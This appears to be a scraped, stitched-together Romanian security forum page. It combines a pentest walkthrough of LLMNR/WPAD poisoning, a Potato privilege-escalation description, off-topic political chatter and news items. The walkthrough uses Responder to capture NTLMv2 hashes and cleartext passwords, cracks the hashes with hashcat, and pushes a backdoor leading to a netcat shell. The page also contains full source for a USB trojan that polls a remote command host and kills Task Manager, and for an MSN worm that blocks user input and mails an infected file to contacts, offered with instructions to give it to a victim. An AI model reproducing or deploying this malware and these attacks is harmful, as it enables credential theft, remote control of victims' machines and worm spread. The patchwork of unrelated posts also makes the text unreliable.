Administrator::PENTESTLAB:1122334455667788:E360938548A17BF8E36239E2A3CC8FFC:0101000000000000EE36B4EE7358D201E09A8038DE69150F0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C00080030003000000000000000000000000030000056A8A45AB1D3338B0049B358B877AEEEE1AA43715BA0639FB20A86281C8FE2B40A0010000000000000000000000000000000000009001A0063006900660073002F00660069006C00650073007200760072000000000000000000 Hashcat is an open-source password cracking tool. Besides, it has GPU support. It can detect the hash pattern with the -m parameter. At the end of the command, it will start a brute force attack by using dictionary. root@kali:/usr/share/responder# hashcat -m 5600 SMB-NTLMv2-Client-10.7.7.30.txt ~/dic.txt Initializing hashcat v2.00 with 4 threads and 32mb segment-size... Added hashes from file SMB-NTLMv2-Client-10.7.7.30.txt: 1 (1 salts) Activating quick-digest mode for single-hash with salt tatus [p]ause [r]esume ypass [q]uit => Input.Mode: Dict (/root/dic.txt) Index.....: 1/5 (segment), 3625424 (words), 33550339 (bytes) Recovered.: 0/1 hashes, 0/1 salts Speed/sec.: 6.46M plains, 6.46M words Progress..: 3625424/3625424 (100.00%) Running...: --:--:--:-- Estimated.: --:--:--:-- --- snippet --- ADMINISTRATOR::PENTESTLAB:1122334455667788:e360938548a17bf8e36239e2a3cc8ffc:0101000000000000ee36b4ee7358d201e09a8038de69150f0000000002000a0073006d006200310032000100140053004500520056004500520032003000300038000400160073006d006200310032002e006c006f00630061006c0003002c0053004500520056004500520032003000300038002e0073006d006200310032002e006c006f00630061006c000500160073006d006200310032002e006c006f00630061006c00080030003000000000000000000000000030000056a8a45ab1d3338b0049b358b877aeeee1aa43715ba0639fb20a86281c8fe2b40a0010000000000000000000000000000000000009001a0063006900660073002f00660069006c00650073007200760072000000000000000000:Abcde12345. All hashes have been recovered Input.Mode: Dict (/root/dic.txt) Index.....: 5/5 (segment), 552915 (words), 5720161 (bytes) Recovered.: 1/1 hashes, 1/1 salts Speed/sec.: - plains, 1.60M words Progress..: 552916/552915 (100.00%) Running...: 00:00:00:01 Estimated.: > 10 Years Started: Sat Dec 17 23:59:22 2016 Stopped: Sat Dec 17 23:59:25 2016 root@kali:/usr/share/responder# And voila! We get password which is Abcde12345. What is WPAD? Organisations allow employees to access the internets through proxy servers to increase performance, ensure security and track traffic.Users who connected to the corporate network need to know proxy server for specific URL without doing configuration. The Web Proxy Auto-Discovery Protocol (WPAD) is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL. How WPAD works? The client wants to access the wpad.dat configuration file for proxy configuration. It searches computers named as “wpad” on the local network to find this file. And then following steps are carried out: If the DHCP Server is configured, the client retrieves the wpad.dat file from the DHCP Server (if successful, step 4 is taken) The wpad.corpdomain.com query is sent to the DNS server to find the device that is distributing the Wpad configuration. (If successful, step 4 is taken) Sent LLMNR query for WPAD (if success, go step 4 else proxy can’t be use) Download wpad.dat and use According to the above sequence, DHCP poisoning attack can be done for the first step. DNS poisoning attack can naturally be performed for the second step. But as I pointed out at the beginning of this article, configured network devices prevent these attacks. When a query is made through the LLMNR, this request will go to every client in the network via broadcast. At this point the attacker sends his wpad.dat file to the clients, acting like a wpad server. The important thing is that WPAD protocol is built in Windows operating systems. This configuration can be seen in the LAN Settings Section of the Internet Explorer browser. With this configuration, Internet Explorer makes a WPAD name resolution query on the whole network. Abusing WPAD Responder is a great utility for MiTM attack. Responder serves a fake WPAD Server and responds to clients’ WPAD name resolution. The client then requests the wpad.dat file from this fake WPAD Server. Responder creates an authentication screen and asks clients to enter the username and password they use in the domain. Naturally, employees write usernames and passwords used in the domain name. Finally, we can see their username and passwords. Using Responder tool is really simple. root@kali:~# git clone https://github.com/SpiderLabs/Responder.git Cloning into 'Responder'... remote: Counting objects: 886, done. remote: Total 886 (delta 0), reused 0 (delta 0), pack-reused 886 Receiving objects: 100% (886/886), 543.75 KiB | 255.00 KiB/s, done. Resolving deltas: 100% (577/577), done. Checking connectivity... done. I set up the following systems in order to simulate this attack. Now, we serve the fake HTTP Server and wait for clear-text passwords. root@kali:~/Responder# python Responder.py -I eth0 -wFb --- snippet --- [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [ON] Force Basic Auth [ON] Force LM downgrade [OFF] Fingerprint hosts [OFF] [+] Generic Options: Responder NIC [eth0] Responder IP [10.7.7.31] Challenge set [1122334455667788] [+] Listening for events... And our victim will see the following dialog box and naturally type the username and password. And clear-text password is in below: root@kali:~/Responder# python Responder.py -I eth0 -wFb --- snippet --- [+] Listening for events... [*] [NBT-NS] Poisoned answer sent to 10.7.7.30 for name GOOGLE.COM (service: Workstation/Redirector) [*] [NBT-NS] Poisoned answer sent to 10.7.7.30 for name WWW.GOOGLE.COM (service: Workstation/Redirector) [HTTP] Basic Client : 10.7.7.30 [HTTP] Basic Username : PENTESTLAB\roland [HTTP] Basic Password : secr3tPassw0rd123! [*] [LLMNR] Poisoned answer sent to 10.7.7.30 for name respproxysrv [SMB] NTLMv2-SSP Client : 10.7.7.30 [SMB] NTLMv2-SSP Username : PENTESTLAB\Administrator [SMB] NTLMv2-SSP Hash : Administrator::PENTESTLAB:1122334455667788:8EBDB974DF3D5F4FB0CA15F1C5068856:01010000000000007894C6BE2C54D201FCEDFDB71BB6F1F20000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000000000000300000B39077D5C9B729062C03BB45B88B0D9EC2672C57115A1FE3E06F77BD79551D8F0A001000000000000000000000000000000000000900220063006900660073002F007200650073007000700072006F00780079007300720076000000000000000000 [SMB] Requested Share : \\RESPPROXYSRV\IPC$ [*] [LLMNR] Poisoned answer sent to 10.7.7.30 for name respproxysrv [*] Skipping previously captured hash for PENTESTLAB\Administrator [SMB] Requested Share : \\RESPPROXYSRV\PICTURES [*] [LLMNR] Poisoned answer sent to 10.7.7.30 for name respproxysrv [*] Skipping previously captured hash for PENTESTLAB\Administrator [SMB] Requested Share : \\RESPPROXYSRV\PICTURES [*] [LLMNR] Poisoned answer sent to 10.7.7.30 for name respproxysrv [*] Skipping previously captured hash for PENTESTLAB\Administrator [SMB] Requested Share : \\RESPPROXYSRV\PICTURES [*] Skipping previously captured hash for PENTESTLAB\roland Backdoor with Responder The responder is not only MiTM attack for the WPAD service. It can force victims to downloadinga malicious files by directing ze to a fake web page. Social engineering can be used to realistically prepare the web page to be used for this attack. However, the Responder itself has a fake redirect page as well. All we need to do is make a few changes to the responder.conf file. We set “Serve-HTML” and “Serve-EXE” parameters to “On”. [HTTP Server] ; Set to On to always serve the custom EXE Serve-Always = On ; Set to On to replace any requested .exe with the custom EXE Serve-Exe = On ; Set to On to serve the custom HTML if the URL does not contain .exe ; Set to Off to inject the 'HTMLToInject' in web pages instead Serve-Html = On And we’re starting to run the Responder again. root@kali:~/Responder# python Responder.py -I eth0 -i 10.7.7.31 -r On -w On Now, when the victim tries to go out to the internet, ze will only see the following page. And by chance, the victim clicks on the Proxy Client connection and Bind downloads the CMD Shell, so we can connect to the victim’s 140 connection point with netcat. root@kali:~/Responder# nc 10.7.7.30 140 -vv 10.7.7.30: inverse host lookup failed: Host name lookup failure (UNKNOWN) [10.7.7.30] 140 (?) open | | | /\ | /\ //\. .//\ //\ . //\ / ( )/ \ Welcome To Spider Shell! ipconfig Microsoft Windows [Version 6.1.7601] (c) 2009 Microsoft Corporation. All Rights reserved. C:\Users\Roland\Desktop>ipconfig ipconfig Windows IP Configuration Ethernet adapter Ethernet: Connection-spesific DNS Suffix . : PENTESTLAB.local IPv4 Address . . . . . . . . . . . : 10.7.7.30 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.7.7.1 Mitigations against WPAD First solution for this attack is, create DNS entry with “WPAD” that points to the corporate proxy server. So the attacker won’t be able to manipulate the traffic. Second solution is disable “Autodetect Proxy Settings” on all Internet Explorers with Group Policy. References https://en.wikipedia.org/wiki/NT_LAN_Manager https://github.com/SpiderLabs/Responder https://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol http://www.defenceindepth.net/2011/04/attacking-lmntlmv1-challengeresponse.html https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning https://www.us-cert.gov/ncas/alerts/TA16-144A Sursa: https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/

Potato Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 How it works Potato takes advantage of known issues in Windows to gain local privilege escalation, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using the techniques outlined below, it is possible for an unprivileged user to gain "NT AUTHORITY\SYSYTEM" level access to a Windows host in default configurations. The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches: 1. Local NBNS Spoofer NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. For privilege escalation purposes, we can't assume that we are able to sniff network traffic, so how can we accomplish NBNS spoofing? If we can know ahead of time which host a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a response and flood the target host with NBNS responses (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response. We can overcome this by flooding quickly and iterating over all 65536 possible values. What if the host we are trying to spoof has a DNS record already? Well we can FORCE DNS lookups to fail in a funny way. Using a technique called "port exhaustion" we bind to every single UDP port. When you try to perform a DNS lookup it will fail because there will be no available source port for the DNS reply to come to. In testing, this has proved to be 100% effective. 2. Fake WPAD Proxy Server With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host "WPAD", or "WPAD.DOMAIN.TLD", and we say that the WPAD host has IP address 127.0.0.1. At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for "http://wpad/wpad.dat", it responds with something like the following: FindProxyForURL(url,host){ if (dnsDomainIs(host, "localhost")) return "DIRECT"; return "PROXY 127.0.0.1:80";} This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1. Interestingly, this attack when performed by even a low privilege user will affect all users of the machine. This includes administrators, and system accounts. See the screenshots "egoldstein_spoofing.png" and "dade_spoofed.png" for an example. 3. HTTP -> SMB NTLM Relay With all HTTP traffic now flowing through a server that we control, we can do things like request NTLM authentication... In the Potato exploit, all requests are redirected with a 302 redirect to "http://localhost/GETHASHESxxxxx", where xxxxx is some unique identifier. Requests to "http://localhost/GETHASHESxxxxx" respond with a 401 request for NTLM authentication. The NTLM credentials are relayed to the local SMB listener to create a new system service that runs a user-defined command. This command will run with "NT AUTHORITY\SYSTEM" privilege. Link: https://github.com/foxglovesec/Potato

Poftim: aici pass: PENTRU_HATERII_RST

Symantec’s assistance paves way for long-running FBI investigation into gang that stole up to $35 million from victims. Three Romanian men have been indicted in the US for allegedly operating a longstanding fraud operation known as Bayrob that conned victims out of millions of dollars. Bogdan Nicolescu (aka “Masterfraud”, aka “mf”); Danet Tiberiu (aka “Amightysa”, aka “amy”); and Radu Miclaus (aka “Minolta”, aka “min”) were arrested by police in Romania earlier this year before being extradited to the US, where they now face multiple charges relating to fraud, identity theft, money laundering, and trafficking in counterfeit goods or services. Our research shows that the Bayrob gang are career cybercriminals, earning a living from online fraud. They specialize in detailed scams and go to great lengths to craft convincing emails and create fake websites, voice messages, and even customer support chatrooms in order to dupe victims. The gang began its career running elaborate cons where it created fake vehicle auctions to defraud victims out of tens of thousands of dollars. It later expanded and diversified with a number of different fraud and malware operations, ranging from credit card theft to cryptocurrency mining using infected computers. The FBI believes that the Bayrob group has stolen at least US$4 million from victims over the past eight years, though the actual total may be up to $35 million. It also established that the group infected between 60,000 and 160,000 computers and sent out 11 million malicious emails. The arrests are the culmination of an eight-year law enforcement investigation which was assisted by Symantec. During this time, Symantec discovered multiple versions of Bayrob malware, collected helpful intelligence data, and witnessed Bayrob as it morphed from online fraud to a 300,000+ botnet for cryptocurrency mining. Symantec succeeded in exposing the gang’s operations, gaining insight into its key players, tactics, malware, and the potential impact and criminal activity undertaken. Read more: https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us

E minunat. Absolut divin.

Prezenta execrabila la vot, in special a celor tineri care au preferat sa pișe ochii pe Feisbuc si Tuităr. Dar este o letargie generala de 27 ani incoace, ca stare a natiunii, o stare de acceptare a flegmelor, de invidie pe vecinul, de auto-compatimire. Inca mai sper la un cutremur serios sa se lase cu mai multe zeci de mii - caci atunci, poate doar atunci, romanul se va destepta din somnul cel de moarte, chiar daca pentru o clipa scurta si apoi intra iarasi in somnu'i cryogenic. Dar cum sunt sanse (dpdv matematic) foarte mici ca sa se produca ceva radical inspre bine in viitorul apropiat, cei care vreti sa va faceti o familie si sa aveti copii, daca va doriti un viitor mai bun pentru ei, solutia este in afara granitelor.

Romanii sunt chiar atat de prosti. Nu s-a trisat deloc

Toata chestia cu votul este o manipulare, menita sa dea oamenilor iluzia ca defapt ei sunt cei care aleg, care decid pentru viitorul lor, la fel ca si religia, din punctul meu de vedere. uitati-va in ultimii 25 de ani, ce am votat defapt ?

Adica l-ai furat si intrii aici la noi sa te ajutam?

#include <windows.h> #pragma comment(lib, "Winmm.lib") #include <urlmon.h> #pragma comment(lib, "urlmon.lib") #include <iostream> #include <fstream> #include <WinInet.h> #pragma comment(lib, "WinInet.lib") #include <ShlObj.h> using namespace std; int Option, Assign, Target; DWORD WINAPI LowProfile(LPVOID); DWORD WINAPI Option1(LPVOID); DWORD WINAPI Option2(LPVOID); DWORD WINAPI Option3(LPVOID); DWORD WINAPI Option4(LPVOID); DWORD WINAPI Option5(LPVOID); // Add more lines of Option6, Option7, etc. to create more commands. HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS; int main() { // Hide Console Window FreeConsole(); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL); // Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file BEFORE you plug in the U3 drive. FILE *istream; if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) { URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL); } else { } // Store Assign.txt in a variable ifstream inAssign; inAssign.clear(); inAssign.open("c:\\Windows\\trojan\\assign.txt"); inAssign >> Assign; inAssign.close(); inAssign.clear(); // Start the main loop that is downloading the textfile each 5 seconds. while(1) { // Download Option & Target remove("c:\\Windows\\trojan\\option.txt"); remove("c:\\Windows\\trojan\\target.txt"); DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/"); DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html"); Sleep(100); URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL); URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL); // Read Option ifstream inFile; inFile.clear(); inFile.open("c:\\Windows\\trojan\\option.txt"); inFile >> Option; inFile.close(); inFile.clear(); // Read Target ifstream inTarget; inTarget.clear(); inTarget.open("c:\\Windows\\trojan\\target.txt"); inTarget >> Target; inTarget.close(); inTarget.clear(); // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan) if(Target == Assign || Target == 0) { if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); } else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); } else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); } else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); } else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); } // Add more of these lines for more commands } Sleep(5000); } } // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive. DWORD WINAPI LowProfile(LPVOID) { while(1) { // Obvious TaskMgr = FindWindow(NULL,L"Windows Task Manager"); // May popup because of new hardware installation (U3) SysError = FindWindow(NULL,L"System Settings Change"); // Windows Media Player may popup. Rarely happens, but had this once at a school computer. WMP = FindWindow(NULL,L"Windows Media Player"); // The Removable Disk part of the U3 Drive can open automatically. Disk1 = FindWindow(NULL,L"(D:) Removable Disk"); Disk2 = FindWindow(NULL,L"(E:) Removable Disk"); Disk3 = FindWindow(NULL,L"(F:) Removable Disk"); Disk4 = FindWindow(NULL,L"(G:) Removable Disk"); // Autoplay Autoplay = FindWindow(NULL,L"Autoplay"); // Errors caused by our VBScript go.vbs VBS = FindWindow(NULL,L"Windows Script Host"); if( TaskMgr != NULL) { SetWindowText( TaskMgr,L"DIE!!!! =O"); Sleep(500); PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( SysError != NULL) { PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( WMP != NULL) { Sleep(1000); PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Disk1 != NULL) { PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Disk2 != NULL) { PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Disk3 != NULL) { PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Disk4 != NULL) { PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Autoplay != NULL) { PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( VBS != NULL) { PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0); } Sleep(500); } } // // Here we start with our commands. Option1, Option2, Option3, etc. // Don't forget to also define and create a process for these Options if you want to create more. // Have Fun =D // DWORD WINAPI Option1(LPVOID) { // 1 return 0; } DWORD WINAPI Option2(LPVOID) { // 2 return 0; } DWORD WINAPI Option3(LPVOID) { // 3 return 0; } DWORD WINAPI Option4(LPVOID) { // 4 return 0; } DWORD WINAPI Option5(LPVOID) { // 5 return 0; }

#include <Windows.h> // We include the windows header library since we are working with winapi #ifdef _WIN32_WINNT & 0x0403 #pragma comment(linker, "/ALIGN:4096") // Win2k8+ likes to limit buffers to 2048-bit array #pragma warning(disable : 4106) // This error tends to come up alot, let's just ignore it #define WIN32_LEAN_AND_MEAN // Shouldn't this be a standard by now? #endif /* We must always prototype the functions that we will use in our program prior to defining them so the compiler wil know what to expect when reading code. Good programming practice */ int MSN_StartFileSpread(LPSTR spread_file, LPSTR spread_msg); BOOL MSN_CopyDataToCB(LPSTR cb_data, HWND hwnd); BOOL MSN_CopyFiletoCB(LPSTR cb_data, HWND hwnd); int MSN_CloseActiveWindow(); // #import "../xxx/path/to/tlb/file" NOTE BELOW /* This should be the path to the msn messenger API class note it's a .tlb file -- I have another function which gets the base file path then afterwords you would just import it, but I'm sure it won't be too hard to make a function for this since it's like the only .tlb file in the MSN folder lul -> Just GetModuleFileName() it */ BOOL MSN_CopyDataToCB(LPSTR cb_data, HWND hwnd) { HGLOBAL hGlobal; LPVOID lpData; if (OpenClipboard(hwnd) <= 0) return FALSE; // if we cannot open clip-board then exit () EmptyClipboard(); // empty the data inside the clipboard so we can put new data in hGlobal = GlobalAlloc(GMEM_DDESHARE|GMEM_MOVEABLE,strlen(cb_data)+1); // reserve null bytes + alloc hGlobal = GlobalLock(lpData); // so it blocks further data to be inserted into this c/b by the user strcpy((LPSTR)lpData, cb_data); // Copy the clip_board data passed by param(1) to allocated grid GlobalUnlock(hGlobal); // allow user to use data now since we cleared previous space with our data SetClipboardData(CF_TEXT, lpData); // let the computer known that standard text is passed to c/b // other standards include CF_ANSI and CF_UNICODE, POSIX std CloseClipboard() ; // close clipboard just like we would a socket since its no longer in use GlobalFree(lpData); // and of course clear the string data of original param for re-use // this is just in case we want to use function again we wont have // the old string data inside the clipboard if we want to add new return ERROR_SUCCESS; // Notify the compiler, if it got to here, feed it 1 bit, good job! } /* * This is fun, and you'll see it a lot in my programs * I only include headers where needed. Here I include * shlobj.h so I can use the DROPFILES Union Structure * It allows me to link an filename to virtual memory * directly without the need to allocate memory space * Also note, just because the include is all the way * out here doesn't mean it's not the preprocessor any * more. The way MASM interprets x86 binary files is it * would scan the file for pre-definte values before * scanning for virtual includes (#def, #ifdef). After * that is complete, it would look for the typecasts and * namespace defintions, then functions prototypes, then * finally it reads the code within your function header */ #include <shlobj.h> BOOL MSN_CopyFiletoCB(LPSTR cb_data, HWND hwnd) { char InfectedFile[MAX_PATH]; // MAX_PATH = 256 characters just windows standard int InfFileSize = NULL; // sizeof dropped object + data file, and its good to initialize always HANDLE hdData; LPDROPFILES lpDP; LPBYTE lpbData; memset(InfectedFile, 0, sizeof InfectedFile); // set 0 bytes of data to InfectedFilePath strcpy(InfectedFile, cb_data); // Copy file path passed from param(1) to InfectedFile if (OpenClipboard(hwnd) == FALSE) return FALSE; // again check if we can open clipboard if not exit EmptyClipboard(); InfFileSize = sizeof DROPFILES + sizeof InfectedFile; // set the file size accordingly hdData = GlobalAlloc(GHND, InfFileSize); // The filesize is set GMEM_MOVEABLE | GMEM_ZEROPOINT lpDP = (LPDROPFILES)::GlobalLock (hdData); // We need to use data value, dont allow interaction lpDP->pFiles = sizeof DROPFILES; lpDP->fWide = FALSE; lpbData = (LPBYTE)lpDP + sizeof DROPFILES; // lpDP is the denoted drop file structure add to data CopyMemory (lpbData, InfectedFile, sizeof InfectedFile); // Copy our data to the infected file // by providing it a size == to sizeof(infectedfile) GlobalUnlock (hdData); // Okay, we're done with the data set, we can now use it SetClipboardData (CF_HDROP, hdData); // Finally set the clipboard data associated it with file CloseClipboard (); // close the clipboard since we are no longer using it return ERROR_SUCCESS; // return 0x1, this is satisfaction for our compiler } int MSN_CloseActiveWindow() { HWND msn = NULL; // initiate it or compiler complains for (int i=0; // initialize 'i' variable in the loop (msn = FindWindow // declaring header window handler to FindWindow API hook (TEXT("IMWindowClass"), // We are looking for an active window called 'IMWindowClass' NULL)) != NULL; i++) // keep going until we find it, there should only be two active { SendMessage(msn,WM_CLOSE,(LPARAM)0,(WPARAM)0); // once the window is found, close it } return EXIT_SUCCESS; // exit, same as earlier, except different circumstance, same value though } int MSN_StartFileSpread(LPSTR spread_file, LPSTR spread_msg) { LONG IMW; BSTR cname; long ICS, i; HRESULT res; VARIANT vtu; MISTATUS mIS; int counter = NULL; IMSNMessenger3* imsnCall = NULL; IDispatch* getID = NULL; IDispatch* dPCS = NULL; IDispatch* dPC = NULL; IMSNMessengerContacts* pIMCS = NULL; IMSNMessengerContact* pIMC = NULL; IMSNMessengerWindow* pIMW = NULL; CoInitialize(0); // Call the Init thread from MSN header lib res = CoCreateInstance(SID_MSGPT, // Create a passive thread NULL, CLSCTX_ALL, RID_MSNQUERY, // to look for online users (void*)&imsnCall); // in the victims friends list and save if (FAILED(res)) return -1; // if msn query fails (i.e. no users are online) then exit file spread imsnCall->get_MyContacts(&dPCS); // Compose list of online contants into list denoted by dPCS res = dPCS->QueryInterface (__uuidof(pIMCS), (LPVOID*)&pIMCS); if (FAILED(res)) return -1; // If list confirmation query fails and list is not found exit res = pIMCS->get_Count(&ICS); // get number of contacts in the online list if (FAILED(res)) return -1; // if we failed to get number of contacts, the exit BlockInput(true); // This is a fun switch that blocks input from the user (keyboard+mouse) for (i = 0; i < ICS; i++) // perform a for loop going through ICS (each person in contact list) { getID = NULL; // victim id = 0 res = pIMCS->raw_Item(i, &dPCS); // load contact list into current input frame (dPCS) if (FAILED(res)) continue; // if it fails, we don't really care, it works anyways res = dPC->QueryInterface(__uuidof(pIMC),(LPVOID*)&pIMC); // input frame focus on current user if (SUCCEEDED(res)) // if the input frame is set then perform loop to load file { res = pIMC->get_Status(&mIS); // is the user online or offline when we message them? if (FAILED(res) || mIS == MISTATUS_OFFLINE) // if we cant get status or user offline->exit { pIMC->Release(); // clear current contact list dPC->Release(); // refresh and try again continue; // we can move on to next query (flag 1), 1 more and worm will exit } pIMC->get_SigninName(&cname); // the following line inherits this function VariantInit(&vtu); // create a new thread to check for users active in chat res = imsnCall->raw_InstantMessage(vtu,&getID); // check if contact is blocked or not if (FAILED(res)) // if the contact is blocked which is denoted by a -1 (FAILED) { pIMC->Release(); // clear contact list dPC->Release(); // refresh and try again continue; // even if it is blocked, we can move on (flag 2), worm spreader now exits } // if both flags were marked then something is wrong (anti-debug) possible analysis res = getID->QueryInterface(RID_MSNMSG_Window, (void*)&pIMW); // Open chat with our victim if (SUCCEEDED(res)) // If it successed then continue, if not, well, no point then... quit { pIMW->get_HWND(&IMW); // Gets current state of the window (error checking is it active?) SetForegroundWindow((HWND) IMW); // if not active (passed from previous call) now it is SetFocus((HWND) IMW); // Set the mouse focus on the chat box inside the current window ShowWindow((HWND) IMW, 0); // Open window in physical memory, now we interact with it if (MSN_CopyDataToCB(spread_msg,(HWND)IMW)&0x1) // &0x1 checks if function executes {// Now that we opened a chat session we can send our payload (message in this case) keybd_event(VK_CONTROL,NULL,KEYEVENTF_EXTENDEDKEY,NULL); // Press and hold ctrl keybd_event(VkKeyScan('V'),NULL,NULL,NULL);// Look for the 'v' key keybd_event(VK_CONTROL,0xFF45,KEYEVENTF_EXTENDEDKEY,NULL); // Insert our data keybd_event(VK_RETURN,NULL,NULL,NULL); // hit the enter key }// these keyboard events will paste the data pased from "spreadmessage" into chat if (MSN_CopyFiletoCB(spread_file,(HWND)IMW)&0x1) // same routine, in this case it { // it loads a file to the chat session (file upload) no need for RETURN key keybd_event(VK_CONTROL,NULL,KEYEVENTF_EXTENDEDKEY,NULL); keybd_event(VkKeyScan('V'),NULL,NULL,NULL); keybd_event(VK_CONTROL,0xFF45,KEYEVENTF_EXTENDEDKEY,NULL); }// The function class already processes the file upload routine as defined previously counter++; // +1 successfull payload sent, increase return bits for the end } pIMC->Release(); // clear the contact list dPC->Release(); // refresh and try again }// unless the current contact list buffer is at the max (for-loop is finished) } imsnCall->Release(); // clear the composed contact list, refresh active buffer BlockInput(false); // the victim can now interact with his computer once again pIMCS->Release(); // clear the value of number of contacts in victims list dPCS->Release() ; // clear all remaining contact from virtual layer buffer CoUninitialize(); // Uninitialize the init call for the MSN messenger API // We now uninitialzed the API since our worm has finished its task return counter; // return the number of bits equal to victims queried } Instructions: You simply need to link the MSN API binary (as commented in the code), and compile it with MSVS2012 providing the following linker options: _CRT_SECURE_NO_WARNINGS _OPTIMIZE_GSY_SECURE _HEADER_NO_NODE_INC Then you give it to your victim. It's very quiet, and works nicely in the background without the victim's knowledge. The payload is only 7.6kb and includes 2 anti-debugging/anti-detect routines. CREDITS: BugTrack

Meet an all-new Hacker’s Search Engine similar to Shodan – Censys. At the end of last month, security researchers from SEC Consult found that the lazy manufacturers of home routers and Internet of Things (IoT) devices have been re-using the same set of hard-coded cryptographic keys, leaving around 3 millions of IoT devices open to mass hijacking. But how did the researchers get this number? Researchers uncovered these devices with the help of Censys – a new search engine that daily scans the whole Internet for all the vulnerable devices. Censys Maintains Complete Database of Everything on The Internet Censys is similar to hacker's search engine Shodan, which is designed specifically to locate any devices that have been carelessly plugged into the Internet without much attempt at preventing unauthorized access. However, Censys employs a more advanced method to find vulnerabilities in the devices and make the Internet a safer place. Censys is a free search engine that was originally released in October by researchers from the University of Michigan and is powered by the world's biggest search engine Google. Censys is part of an open source project that aims at maintaining a "complete database of everything on the Internet," helping researchers and companies unearth Online security mishaps and vulnerabilities in products and services. How Does Censys Work? Censys collects information on hosts and websites via daily scans of the IPv4 address space – the internet protocol version 4 that routes the majority of the Internet traffic today. In order to do so, the new search engine uses two companion tools: ZMap – an open-source network scanner ZGrab – an application layer scanner Censys then maintains a database of how hosts and websites are configured, allowing researchers to query the data through a search interface, report builder, and SQL engine. ZMap scans over 4 Billion IP addresses on the Internet and collects new data every day. It also helps determine whether the machines on the internet have security vulnerabilities that should be fixed before being exploited by the hackers. "We have found everything from ATMs and bank safes to industrial control systems for power plants. It's kind of scary," said Zakir Durumeric, the researcher leading the Censys project at the University of Michigan. Obvious flaws in addition to issues caused by IT administrator failures can also be found. Here's the MIT Technology Review on Censys, titled "A Search Engine for the Internet’s Dirty Secrets." More details on the Censys architecture and functionalities are available in the team's research paper. If you would like to give Censys a try, you can follow the step-by-step tutorial offered by the developers. Sursa

